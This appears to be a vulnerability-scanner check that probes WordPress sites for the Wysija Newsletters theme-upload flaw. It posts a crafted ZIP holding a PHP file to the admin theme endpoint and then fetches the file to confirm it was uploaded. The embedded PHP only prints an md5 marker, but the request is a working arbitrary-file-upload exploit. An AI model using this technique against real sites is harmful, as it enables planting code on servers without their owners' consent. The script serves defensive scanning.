#include helpers.inc;
#include string_helpers.inc;
#include reporting_helpers.inc;
// **************************************************************************************
function alert(fname, job, confirmURL)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname; 	
		
	ri.setHttpInfo(job);	
	ri.Details =  ri.Details + "PHP file was uploaded at: [blue]" + confirmURL + "[/blue]";	
	
	AddReportItem(ri);
}
// **************************************************************************************
function test_wysija_newsletters_upload(dir, path, zipFile){
	if (!path.endsWith('/')) path = path + '/';	
	
	var http = new THTTPJob();
	http.url = dir.url;
	http.verb = 'POST';
	http.uri = path + '/wp-admin/admin-post.php?page=wysija_campaigns&action=themes';
	http.request.addHeader("Content-Type", "multipart/form-data; boundary=_Part_33_757978666_4208535103", true);
	http.addCookies = true;	
	
	http.request.body = 
        '--_Part_33_757978666_4208535103' + CRLF() +
		'Content-Disposition: form-data; name="my-theme"; filename="UMopP.zip"' + CRLF() +
		'Content-Type: application/x-zip-compressed' + CRLF() +
		'Content-Transfer-Encoding: binary' + CRLF() +
        '' + CRLF() +
        zipFile + CRLF() +
        '--_Part_33_757978666_4208535103' + CRLF() +
        'Content-Disposition: form-data; name="overwriteexistingtheme"' + CRLF() +
        '' + CRLF() +
        'on' + CRLF() +
        '--_Part_33_757978666_4208535103' + CRLF() +
        'Content-Disposition: form-data; name="action"' + CRLF() +
        '' + CRLF() +
        'themeupload' + CRLF() +				
        '--_Part_33_757978666_4208535103' + CRLF() +
        'Content-Disposition: form-data; name="submitter"' + CRLF() +
        '' + CRLF() +
        'Upload' + CRLF() +				
        '--_Part_33_757978666_4208535103' + CRLF() +
        'Content-Disposition: form-data; name="page"' + CRLF() +
        '' + CRLF() +
        'OJkonvNmuP' + CRLF() +			
        '--_Part_33_757978666_4208535103--';
                	
	http.execute();	
	
	if ((!http.wasError && http.responseStatus == 302)){
		// confirm the upload
		var confirmhttp = new THTTPJob();
		confirmhttp.url = dir.url;
		confirmhttp.uri = path + '/wp-content/uploads/wysija/themes/LrjFYxgZDs/acunetix.php';
		confirmhttp.verb = 'GET';
		confirmhttp.execute();
		
		var confirmd5 = "082119f75623eb7abd7bf357698ff66c";
		if (!confirmhttp.wasError && (confirmhttp.responseStatus == 200) && confirmhttp.response.body.indexOf(confirmd5) != -1){
			alert("Wordpress_wysija_newsletters_upload.xml", http, confirmhttp.uri);
		}
	}			
}
var dir = getCurrentDirectory();
var zipFile = strFromRawData(0x50, 0x4B, 0x03, 0x04, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6F, 0x82, 0xFD, 0x44, 0x00,  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00,  0x4C, 0x72, 0x6A, 0x46, 0x59, 0x78, 0x67, 0x5A, 0x44, 0x73, 0x2F, 0x50, 0x4B, 0x03, 0x04,  0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x84, 0x82, 0xFD, 0x44, 0xE9, 0xC9, 0x06, 0xFD, 0x1E,  0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x4C, 0x72, 0x6A, 0x46,  0x59, 0x78, 0x67, 0x5A, 0x44, 0x73, 0x2F, 0x61, 0x63, 0x75, 0x6E, 0x65, 0x74, 0x69, 0x78,  0x2E, 0x70, 0x68, 0x70, 0x3C, 0x3F, 0x70, 0x68, 0x70, 0x20, 0x64, 0x69, 0x65, 0x28, 0x6D,  0x64, 0x35, 0x28, 0x27, 0x61, 0x63, 0x75, 0x6E, 0x65, 0x74, 0x69, 0x78, 0x27, 0x29, 0x29,  0x3B, 0x20, 0x3F, 0x3E, 0x50, 0x4B, 0x03, 0x04, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,  0x82, 0xFD, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  0x14, 0x00, 0x00, 0x00, 0x4C, 0x72, 0x6A, 0x46, 0x59, 0x78, 0x67, 0x5A, 0x44, 0x73, 0x2F,  0x73, 0x74, 0x79, 0x6C, 0x65, 0x2E, 0x63, 0x73, 0x73, 0x50, 0x4B, 0x01, 0x02, 0x14, 0x00,  0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6F, 0x82, 0xFD, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x72, 0x6A, 0x46, 0x59,  0x78, 0x67, 0x5A, 0x44, 0x73, 0x2F, 0x50, 0x4B, 0x01, 0x02, 0x14, 0x00, 0x0A, 0x00, 0x00,  0x00, 0x00, 0x00, 0x84, 0x82, 0xFD, 0x44, 0xE9, 0xC9, 0x06, 0xFD, 0x1E, 0x00, 0x00, 0x00,  0x1E, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20,  0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x4C, 0x72, 0x6A, 0x46, 0x59, 0x78, 0x67, 0x5A,  0x44, 0x73, 0x2F, 0x61, 0x63, 0x75, 0x6E, 0x65, 0x74, 0x69, 0x78, 0x2E, 0x70, 0x68, 0x70,  0x50, 0x4B, 0x01, 0x02, 0x14, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x82, 0xFD,  0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00,  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x7C, 0x00, 0x00,  0x00, 0x4C, 0x72, 0x6A, 0x46, 0x59, 0x78, 0x67, 0x5A, 0x44, 0x73, 0x2F, 0x73, 0x74, 0x79,  0x6C, 0x65, 0x2E, 0x63, 0x73, 0x73, 0x50, 0x4B, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0x03,  0x00, 0x03, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xAE, 0x00, 0x00, 0x00, 0x00, 0x00);
test_wysija_newsletters_upload(dir, dir.fullPath, zipFile);
